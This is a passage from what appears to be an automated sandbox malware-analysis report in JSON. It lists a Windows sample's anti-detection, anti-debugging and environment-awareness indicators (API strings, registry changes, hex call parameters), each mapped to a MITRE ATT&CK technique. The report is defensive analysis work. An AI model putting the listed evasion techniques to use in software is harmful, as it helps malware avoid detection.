\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-226", "type": 2, "relevance": 1, "name": "Contains ability to delay execution by waiting for signal/timeout (API string)", "description": "Found reference to API \"SetTimer\" (Indicator: \"SetTimer\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"SetTimer\" (Indicator: \"SetTimer\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"rundll32.exe\" called \"FindResourceA\" with parameter \"128\" - (UID: 00000000-00005596)\n \"rundll32.exe\" called \"FindResourceA\" with parameter \"102\" - (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"GetFileTime\" (Indicator: \"GetFileTime\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"FileTimeToSystemTime\" (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API \"FileTimeToLocalFileTime\" (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API \"SystemTimeToFileTime\" (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"9049116994,5916,3024,,RtlGetVersion,NTDLL.dll,\"252:02:53.829\",RX=0,PX=0\" (Indicator: \"GetVersion\"; Source: \"00000000-00006120.00000000.66663.00180000.00000004.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersionExA\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API \"GetVersionExA\" (Indicator: \"GetVersion\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-312", "type": 2, "relevance": 1, "name": "Contains ability to retrieve path in which Windows is installed (API string)", "description": "Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetWindowsDirectoryA\" (Indicator: \"GetWindowsDirectory\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-450", "type": 2, "relevance": 1, "name": "Contains ability to determine if process is running under WOW64 (API string)", "description": "Found reference to API \"16262177023,4012,3147,,IsWow64Process,kernel32.dll,\"252:05:59.339\",RX=0,PX=0\" (Indicator: \"IsWow64Process\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-413", "type": 2, "relevance": 1, "name": "Contains ability to find open windows (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"FindWindowExA\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n file/memory contains long string with (Indicator: \"GetCommandLine\"; File: \"notepad_.exe\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006120)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100771a0000003caa4d7700000000984a1b00406b1900606c190030a01e000870190095e144779cf01200feffffffd4f1120095e144773c471700feffffffff2b48779a2a4877f8f1120000f3120020f21200340000c06cf11200e7384877ec38487740aa4d77340000c020f2120000f31200 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310077ec3848773caa4d7724f21200105e477758f11200e8f012001c5e477764f2120095e144775c431700feffffffec38487761d6b276340000c05d0dca7610f312006ed6b2768c0100004cf2120054f21200ff2b487750f212000200000000000000000000008c01000060091f0058f11200 (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n file/memory contains long string with (Indicator: \"sendmessage\"; File: \"notepad_.exe\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowA\" (Indicator: \"findwindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"FindWindowExA\" (Indicator: \"findwindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-150", "type": 6, "relevance": 5, "name": "Calls an API typically used to get handle of currently active window", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetActiveWindow\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001800904d1b00000000000500000500000000c04f1b00a0151b00080d1b00280000000000180000040000904d1b003cf712000464487738011800e06348774abc4d77000000000000180000001800504d1b00000000004a00004a00000000984d1b00a0151b00080d1b00500200000000180000000400504d1b0088f712000464487738011800e0634877febc4d770000000000001800584d1b000000000003000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000180038411b0000000000290000290000000068431b0040051b00580a1b0048010000000018000040000038411b003cf712000464487738011800e06348774abc4d77000000000000180000001800180a1b00000000000600000600000000580a1b0040051b0090071b00300000000000180000200000180a1b0088f712000464487738011800e0634877febc4d770000000000001800200a1b00000000000300000000000000800000007f0700000000000040051b00500118000000000000001800 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180038411b0000000000290000290000000068431b0040051b00580a1b0048010000000018000040000038411b003cf712000464487738011800e06348774abc4d7700001800180a1b00000000000600000600000000580a1b0040051b0090071b00300000000000180000200000180a1b0080f712000464487738011800e0634877f6bc4d770000000000001800200a1b006e0000000000000000000000030000000000000080000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180038411b0000000000290000290000000068431b0040051b0090071b0048010000000018000040000038411b003cf712000464487738011800e06348774abc4d77000000000000180000001800180a1b00000000000300000300000000700a1b0038db1a00c4001800180000000000180000200000180a1b0088f712000464487738011800e0634877febc4d770000000000001800200a1b000000000003000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180038411b0000000000290000290000000068431b0040051b00200a1b0048010000000018000040000038411b003cf712000464487738011800e06348774abc4d77000000000000180040411b00000000000000000000000000000000000000000000000000a87e1b00500118000000000000001800500118000000000000000000500118000300000300000000283e00166e000000000000000000000003000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000180038411b0000000000290000290000000068431b0040051b00200a1b0048010000000018000040000038411b003cf712000464487738011800e06348774abc4d77000000000000180040411b00000000000000000000000000000000000000000000000000a87e1b00500118000000000000001800500118000000000000000000500118000300000300000000283e00166e00000000000000000000000300000000000000800000007f07000000000000283e00166e00000000000000a87e1b00 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000065786500000000000000e02118001cf9120000000000c0f91200ebdb5a770000ae76a0000000d0f91200dfc7487740835077bec74877a6b24d77ebdb5a77a00000000000ae760000000000000000000000009cf91200000000007cfd120095e14477a64d1700feffffffbec74877548e43750000ae76ffffffff08e04000a84e40000000ae76a8e340000900000000000000ffffffff000000000000ae76a00000002565b4762801000000000000e8170000000000000000000003000000280e00000800000000000000666533393534666466356166313634643861636432646231 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180038411b0000000000290000290000000068431b0040051b00200a1b0048010000000018000040000038411b00a8fa12000464487738011800e0634877deb14d77000000000000180040411b00000000000000000000000000000000000000000000000000a8821b00500118000000000000001800500118000000000000000000500118000300000300000000a83d00956e00000000000000000000000300000000000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000180038411b0000000000290000290000000068431b0040051b0090071b0048010000000018000040000038411b00a8fa12000464487738011800e0634877deb14d77000000000000180000001800180a1b00000000000500000500000000600a1b00f8481b00080d1b00280000000000180000200000180a1b00f4fa12000464487738011800e063487782b14d770000000000001800200a1b00000000000300000000000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000050011800000000000000000040051b0040411b0001011200420000000000000096000001000000001002000001000101d0e3120000000000a0e5120095e144777e591700feffffffe0634877166448770000000040051b00ac00000004e512000000000038051b00e4e412005c554877000018000000000040051b00f4e412003c5e47778dc54375ac00000008e5120010e512000800000004000000f8e5120000000000080000000700000000000000ac000000f8e5120064e5120044a35b7703000000ac000000f8e5120000000000000000000c0000000000000001000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000487700000000000000000000000020b01a00c075ba7620b01a0000000000c075ba76b8fa120079dab276c075ba760200000010fb120072dcb2760000000079dcb276abce46b085fc12006cfb1200ffffffff00000000000000000000000000000000c715ca760000000020b01a001a000000c8fa12000000000078fd1200c2a2b8763be9e6c6feffffff79dcb2765edbb2762c0000003cdf4000000000003f000f005cfb120000000000aedb5a77cf444000020000803cdf40006cfb1200d04340007cdf40006cfb120078fd120058a6400000000000ee684000a8e3400009000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001800000000000000000040051b0040411b0001011200420000000000000096000001000000001002000001000101f4e4120000000000c4e6120095e144777e591700feffffffe0634877166448770000000040051b00a800000028e612000000000038051b0008e612005c554877000018000000000040051b0018e612003c5e47778dc54375a80000002ce6120034e6120008000000040000001ce7120000000000080000000700000000000000a80000001ce7120088e6120044a35b7703000000a80000001ce7120000000000000000000c000000000000000100000000000000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001b0068431b0063431b000000000000000000000018000000000134dc12000000000098e9120095e144775e591700feffffff435c487750594877aa000000b800000062431b0060431b00bcdd1200f4e11200000000000000000000000000000000000000000000000000e00a0000000018001c5c477760d84375ffffffff170000006cdd120024000000030000005ce2120088e71200f4e112008600000098dd120096ed48778a431b00a06a1e7586000000bcdd1200f4e112000000000086008800a06a1e75bcdd1200916c1e758a431b00a06a1e75a06a1e752ce2120002020000 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006120)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf21200000000003c0000002cf31200feffffffb4f21200cf004977d600497798a94d773c0000001e0000002cf312000000000088f2120000000000f0f21200 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000190010ab1e002000000028f012003c000e000600000004f012001c56487710ab1e00b8aa1e000100000008ab1e00e8ef120000294877bcf0120030f012000000000008ab1e00fcef12005c554877000019000000000010ab1e000cf01200675548770000000080f012004bdeb2760000000053deb276f35fc1b100000000000000001cf312000800090040195f760000000000000000 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004d77340000c020f2120000f3120044f1120000000000e0f1120095e144775c431700feffffffec3848773dd1b2766dd1b276835ec1b11c175f76000000000000000020000000f8f1120020f21200000000000000190030a01e0030a01e00180000000c00c000af030000180000008801000020f21200509a1e00060000000cf212000000000000000000000000006cf21200000000006cf21200148eb176000000001c8eb1761f5dc1b1000000000100000000031f000200000058f21200000000000000000079dcb2762b5dc1b1000000000100000000031f000000000000000000 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000190010ab1e002000000028f012003c000e000a00000004f012001c56487710ab1e00b8aa1e000100000008ab1e00e8ef120000294877bcf0120030f012000000000008ab1e00fcef12005c554877000019000000000010ab1e000cf01200675548770000000080f012004bdeb2760000000053deb276f35fc1b101000000000000001cf312000800090040195f760000000000000000 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000054f1120064ef1200340000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000190010ab1e002000000028f012003c000e001200000004f012001c56487710ab1e00b8aa1e000100000008ab1e00e8ef120000294877bcf0120030f012000000000008ab1e00fcef12005c554877000019000000000010ab1e000cf01200675548770000000080f012004bdeb2760000000053deb276f35fc1b103000000000000001cf312000800090040195f760000000000000000 (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"IsWow64Process\" with parameter \"6120\" - (UID: 00000000-00006120)\n \"rundll32.exe\" called \"IsWow64Process\" with parameter \"5596\" - (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-3", "type": 1, "relevance": 1, "name": "Contains ability to query the machine version", "description": "GetVersionExA@KERNEL32.dll at 39956-100-00404650\n GetVersionExA@KERNEL32.DLL at 00000000-00006120-43002-29-00404650", "origin": "Hybrid Analysis Technology", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": 